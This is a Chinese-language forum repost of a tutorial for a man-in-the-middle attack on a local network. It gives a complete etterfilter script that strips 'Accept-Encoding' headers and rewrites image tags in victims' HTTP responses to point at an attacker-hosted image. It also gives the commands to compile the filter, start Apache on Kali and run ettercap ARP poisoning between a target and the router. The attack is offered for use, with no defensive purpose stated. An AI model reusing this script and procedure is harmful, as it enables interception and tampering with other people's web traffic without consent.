Ken1Ve 发布于2022年11月4日 分享 发布于2022年11月4日 一:先准备一张图片恩恩!低调点好!我们将图片放大kali的var/www/html目录下二:启动Apacheservce apache2 start三:编写攻击脚本if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2然后我们载入刚才生成的脚本然后开始中间人攻击 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/219.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。 链接帖子 意见的链接 分享到其他网站 更多分享选项…
推荐的帖子